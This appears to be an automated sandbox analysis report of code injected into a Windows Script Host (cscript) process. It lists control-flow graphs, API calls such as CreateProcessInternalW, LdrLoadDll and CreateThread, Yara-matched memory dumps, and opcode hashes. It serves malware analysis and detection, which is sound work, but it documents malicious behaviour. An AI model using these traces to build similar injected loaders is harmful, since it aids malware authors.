                                                                                                                                                                                                        • Instruction ID: 4e61ffbfd19ed603e57a46319ed8f5a7c19e4bb752943d0a1545f985fa08bf30
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 186d2f74a69ae1b35147a7680f19e298f00e7147c6af35576018a264186e93c1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9090026121340403460571584554617405B8BE0301F91D425E1004594EC57588917125

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0300836A
                                                                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0300838B
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                        • API String ID: 1836367815-3372436214
                                                                                                                                                                                                        • Opcode ID: 6ef3ffc0fe32632290c27dc054df152625fc3ea72ac42161163004552e97edf1
                                                                                                                                                                                                        • Instruction ID: ee57164018c7c0e0b1d91fdc59c153dc0e8db3b4cbcd5c2e8eafa8977cee08e1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ef3ffc0fe32632290c27dc054df152625fc3ea72ac42161163004552e97edf1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3501D835A813287BF721EA949C02FFF7B6C5B80B55F044154FF08BE1C1EAA5690547E6

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 258 3019076-3019077 259 30190a4 258->259 260 3019079-30190a1 258->260 262 30190a6-30190ad 259->262 263 301910f-3019112 259->263 260->259 266 30190dd-301910d call 300acf0 call 3014e50 262->266 267 30190af-30190c2 call 301bd40 262->267 264 3019113-3019118 263->264 265 30190cf-30190db 263->265 268 3019120-3019131 Sleep 264->268 265->266 266->263 278 30190c8-30190ce call 301be10 267->278 279 301919c-30191a2 267->279 272 3019133-3019139 268->272 273 3019196-301919a 268->273 276 3019163-3019183 272->276 277 301913b-3019161 call 3018ca0 272->277 273->268 273->279 281 3019189-301918c 276->281 282 3019184 call 3018eb0 276->282 277->281 278->265 281->273 282->281
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 03019128
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                                                                                        • Opcode ID: 9a87fc1e69d1cef6883ca529739254e621e3a28c5e340b6eefd2a98a85eec123
                                                                                                                                                                                                        • Instruction ID: 8777edbe8b1ffe68e7dc07861c7e7b0e61ddccb26ff770579314af2a6886619b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a87fc1e69d1cef6883ca529739254e621e3a28c5e340b6eefd2a98a85eec123
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E63146B6902304ABC714DF68C885FABB7F8EB88B00F148059E61D5B240D734A661CBE5

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 286 3019080-30190a4 288 30190a6-30190ad 286->288 289 301910f-3019112 286->289 292 30190dd-30190ec call 300acf0 288->292 293 30190af-30190b6 call 301bd40 288->293 290 3019113-3019118 289->290 291 30190cf-30190db 289->291 294 3019120-3019131 Sleep 290->294 291->292 297 30190f1-301910d call 3014e50 292->297 300 30190bb-30190c2 293->300 298 3019133-3019139 294->298 299 3019196-301919a 294->299 297->289 302 3019163-3019183 298->302 303 301913b-3019161 call 3018ca0 298->303 299->294 305 301919c-30191a2 299->305 304 30190c8-30190ce call 301be10 300->304 300->305 307 3019189-301918c 302->307 308 3019184 call 3018eb0 302->308 303->307 304->291 307->299 308->307
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 03019128
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: b9bcff13a90b1ba5da00e8373b1a167007188958bc0109db7198ece4eb4567d8
• Instruction ID: 60197a70edaee46c252d506a6227cff46da0fe1883fe448da718a09ffe91bf35
• Instruction Fuzzy Hash: 963181B6501344ABC724DF68C885FABB7F9AB88B00F14851DF62A5B245D730B660CBA4

Control-flow Graph
control_flow_graph 312 301a6aa-301a6ac 313 301a679-301a687 call 301af60 312->313 314 301a6ae-301a6dc call 301af60 312->314 318 301a68c-301a6a1 RtlFreeHeap 313->318
APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03003AF8), ref: 0301A69D
Strings
Memory Dump Source
• Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
• Opcode ID: be6c27d1feec457bc969d19b3608f641ea7a76b691fc5f59a063ecaea79b291a
• Instruction ID: cc6bfd507be4f9ca4e936013084faa2f3b2b5b3463f023895c4f431286a6274a
• Instruction Fuzzy Hash: 7BF081B17412146FD720DFA4CC45FDB3768EF847A0F108169F91C9B281C631E515CAE0

Control-flow Graph
control_flow_graph 323 301a662-301a687 call 301af60 326 301a68c-301a6a1 RtlFreeHeap 323->326
APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03003AF8), ref: 0301A69D
Strings
Memory Dump Source
• Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
• Opcode ID: bd6d8063d210d9657da92bdbe044f09ebe648b33cd7a801f493260ca015dd881
• Instruction ID: 0482b779bcaac4344183d6e2a140fa57f7a784d2352f24dcf669164385eaa3f3
• Instruction Fuzzy Hash: 70E0A0B62411046BC714CF75CC84ED73B28EF85260F204148F90997241C932D908CAA0

Control-flow Graph
control_flow_graph 327 301a670-301a6a1 call 301af60 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03003AF8), ref: 0301A69D
Strings
Memory Dump Source
• Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
• Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
• Instruction ID: 7165da9534c069eb6d829234b0573c7e272cc5194d48e0682ada0242b35843e2
• Instruction Fuzzy Hash: B9E012B5200208ABDB18EF99CC48EA777ACEF88660F118558FA085B241C630E9108AB0

Control-flow Graph
control_flow_graph 331 3008310-300831f 332 3008328-300835a call 301ca00 call 300acf0 call 3014e50 331->332 333 3008323 call 301be60 331->333 340 300835c-300836e PostThreadMessageW 332->340 341 300838e-3008392 332->341 333->332 342 3008370-300838b call 300a480 PostThreadMessageW 340->342 343 300838d 340->343 342->343 343->341
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0300836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0300838B
Memory Dump Source
• Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
• Instruction ID: f54b71b3e6f06b617c0aa25297874bfe4c9a41f2be8bb94b51db7b170c32e7c5
• Instruction Fuzzy Hash: ED01A735A8132877F721E6949C42FFE776C6B80F50F054154FF04BE1C1EA94691546F5

Control-flow Graph
control_flow_graph 541 300acf0-300ad0c 542 300ad14-300ad19 541->542 543 300ad0f call 301cc50 541->543 545 300ad1b-300ad1e 542->545 546 300ad1f-300ad2d call 301d070 542->546 543->542 549 300ad3d-300ad4e call 301b4a0 546->549 550 300ad2f-300ad3a call 301d2f0 546->550 555 300ad50-300ad64 LdrLoadDll 549->555 556 300ad67-300ad6a 549->556 550->549 555->556
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0300AD62
Memory Dump Source
• Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
• Instruction ID: 913d97646d617bfa293b5c39ad4a5833eeb87a58702c9a62b039c46d709df41b
• Instruction Fuzzy Hash: CF0121B9E4120DBBEF10DBE4DC41FEDB3B89B54608F044595E9199B280F631EB14CB91

Control-flow Graph
control_flow_graph 557 301a6e0-301a738 call 301af60 CreateProcessInternalW
APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0301A734
Memory Dump Source
• Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
• Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
• Instruction ID: 98e62a13916e0f10a64ee408331e0191abeb13a2f0cae02423cb7351c27f9793
• Instruction Fuzzy Hash: 4701B2B2211208BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0300F050,?,?,00000000), ref: 030191EC
Memory Dump Source
• Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: e77c83cb1131cef44361fac56b600d869413f29bcb991ce2bfa0f051c13e034f
• Instruction ID: e9037e7206ba1c8f7a8da6f087998b6b6c6865c1aeda13abca922f0899092b6b
• Instruction Fuzzy Hash: 0EF0A07A6813047BD330AA598C02FD7B6E99B91F54F590129F619EB2C0EBA6F41142D4
APIs
                                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0300F050,?,?,00000000), ref: 030191EC
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                                                        • Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                                                                                                                                                                        • Instruction ID: 759718124d05745df2b79654a5b75f92e7623e8157044e5948546104f84b3f4d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFE06D7B3813043AE330A599AC02FE7B29C8BC1B20F150026FA0DEA2C0D995F41142A4
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,03008D14,?), ref: 0300F6FB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                        • Opcode ID: a589094f4c8c92731364c6586b32332e92142f41525403776c7e97f639c8214b
                                                                                                                                                                                                        • Instruction ID: 1f572b729bb983f1cd0c95258e64bef32f30284aa8c2d6b340926350625250e8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a589094f4c8c92731364c6586b32332e92142f41525403776c7e97f639c8214b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BEF0E976A812082AFB20EA54DC42FF673ACEB94714F054098F40CDB2D2E6A0D5414561
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0300F1D2,0300F1D2,?,00000000,?,?), ref: 0301A800
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                                        • Instruction ID: dbd485406890450d25c7f6561f2e790932834ddf4354128d30b87bf32d7ed4c5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6E01AB52002086BDB10DF89CC84EE737ADEF88650F118154FA0C5B241C930E8108BF5
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(03014536,?,03014CAF,03014CAF,?,03014536,?,?,?,?,?,00000000,00000000,?), ref: 0301A65D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                                        • Instruction ID: e0fca9a95f83d454cf5af7c11cecd9a3f74b734db2dc3448643e00647d4a9722
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CBE012B5201208ABDB14EF99CC40EA777ACEF88664F118558FA085B241C630F9108AB0
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,03008D14,?), ref: 0300F6FB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                        • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                                                                                                        • Instruction ID: 417b52d5f4595631120d2193735d9f6bdc858d18d6655d2c84645b21d72cb001
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9ED05E656503092AE620EAA59C02F6672C85B44A04F490064F9489A2C3D950E0004165
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: a48eb2b41e68b5496b684eb2ebefb4591a5a9d9f64048ec102b4c960ae767f1b
                                                                                                                                                                                                        • Instruction ID: 1e44c1b9ea63ed267dd412a8892a7933bf1f2b15e955893a1303aa0c2a69befb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a48eb2b41e68b5496b684eb2ebefb4591a5a9d9f64048ec102b4c960ae767f1b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8BB092729028C9CAEB11EB604B48B2B7A52BBD0702F66C466E6560685F8778C491F276
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,?,00000000,00000000), ref: 0040750C
                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,?), ref: 00407536
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00407565
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00407576
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00407587
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000), ref: 0040F7C8
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,?,00000000,00000000), ref: 0040F7FB
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,00000000,00000000), ref: 0040F81E
                                                                                                                                                                                                        • RegisterEventSourceW.ADVAPI32(00000000,Windows Script Host), ref: 0040F87F
                                                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,00000100), ref: 0040F8A1
                                                                                                                                                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,?), ref: 0040F8D1
                                                                                                                                                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,?), ref: 0040F93E
                                                                                                                                                                                                        • ReportEventW.ADVAPI32(?,00000010,00000000,C0FF03E8,00000000,00000001,00000000,?,00000000), ref: 0040F9AB
                                                                                                                                                                                                        • DeregisterEventSource.ADVAPI32(?), ref: 0040F9B2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: EventNameOpen$AccountByteCharCloseLookupMultiSourceWide$DeregisterFreeRegisterReportStringUser
                                                                                                                                                                                                        • String ID: LogSecurityFailures$LogSecuritySuccesses$Software\Microsoft\Windows Script Host\Settings$Windows Script Host
                                                                                                                                                                                                        • API String ID: 2267583055-2261343319
                                                                                                                                                                                                        • Opcode ID: 0e8c44b9183b7c76373f81c9df40596d2059af36b8a8c70c5e3c2541c5d96258
                                                                                                                                                                                                        • Instruction ID: f1563035850acd2fad1872510ea165082c65c5e55b6890ae512f6dcfdf4bb9fd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e8c44b9183b7c76373f81c9df40596d2059af36b8a8c70c5e3c2541c5d96258
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03816271A41218BBDB309F619C4DFEA7B78AB08704F1041B6B509B62D1DB78AE84CF59
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,?,00000000,0040B95E,?), ref: 0040BD1E
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0040BD2F
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,0040B95E,?), ref: 0040BD51
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,0040B95E,?), ref: 004114B1
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000,0040B95E,?), ref: 004114D8
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000,?,00000000,0040B95E,?), ref: 004114FF
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00000000,0040B95E,?), ref: 0041151B
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,00000000,?,00000000,0040B95E,?), ref: 0041152E
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,0040B95E,?), ref: 00411543
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,00000000,?,00000000,0040B95E,?), ref: 0041155D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocFormatLocalMessage$ErrorFreeLastString
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 423131097-0
                                                                                                                                                                                                        • Opcode ID: 0f6f0b130dab8e04802e2304999ed6d4898a9f83e54a6ed61de0bc91e12daa77
                                                                                                                                                                                                        • Instruction ID: 3b2fc3b716e7a9c05bb6e02d402eeeacfbf4a81c1beaf203865e465d7c60d9de
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f6f0b130dab8e04802e2304999ed6d4898a9f83e54a6ed61de0bc91e12daa77
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB413471901125BBDB215F569C08EEFBF7CEF45761F108126F915A12A0DB388950CAFD
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CoCreateInstance.OLE32(0040373C,00000000,00000001,004037AC,?,00000000,00000000,?), ref: 0040CDE6
                                                                                                                                                                                                        • CoCreateInstance.OLE32(0040374C,00000000,00000001,004037AC,?), ref: 0040CDFA
                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407E84,00000000), ref: 0040CE11
                                                                                                                                                                                                        • CoGetClassObject.OLE32(0040376C,00000001,00000000,0040375C,?), ref: 0040CEB7
                                                                                                                                                                                                        • CreateBindCtx.OLE32(00000000,00000000), ref: 0040D062
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Create$Instance$BindClassDefaultObjectUser
                                                                                                                                                                                                        • String ID: WSH$WScript
                                                                                                                                                                                                        • API String ID: 1420412123-1019903269
                                                                                                                                                                                                        • Opcode ID: b4a60d2ac2569a0893e9882f25688816e98441a4bcc7eccbe0e22bb52b3f2292
                                                                                                                                                                                                        • Instruction ID: a63f95ab15df632737a4d707f1054108aa74badec750ffc5d0f3a579e6d0fe09
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4a60d2ac2569a0893e9882f25688816e98441a4bcc7eccbe0e22bb52b3f2292
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C12A5B0B01205DFD7149F95E894B6E7BB6AF88310F15447AE502BB3E1CF79AC418B89
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0040DC2D
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0040DC3C
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0040DC45
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 0040DC4E
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0040DC63
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: 3d3e0f0ccbe08046cfc2468e589658abb837f0e89b66af113b62d44b2ef7d46f
                                                                                                                                                                                                        • Instruction ID: e6f71845e864daf5bef548a8fb7f88e5f5a1ec30dbc4a1fe5f4c6b158567165d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d3e0f0ccbe08046cfc2468e589658abb837f0e89b66af113b62d44b2ef7d46f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C11F5B1D01209ABDB10DFB8D948ADEBBF4AB4C314F558876D806E7250E7349A44CB49
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0040DBC0: malloc.MSVCRT ref: 0040DBD8
                                                                                                                                                                                                          • Part of subcall function 0040647E: GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,00406542,00001000,?,?), ref: 004064A8
                                                                                                                                                                                                          • Part of subcall function 0040647E: HeapAlloc.KERNEL32(00000000,?,00406542,00001000,?,?), ref: 004064AF
                                                                                                                                                                                                        • CLSIDFromString.OLE32(?,00407F49,00001000,?,?), ref: 00406557
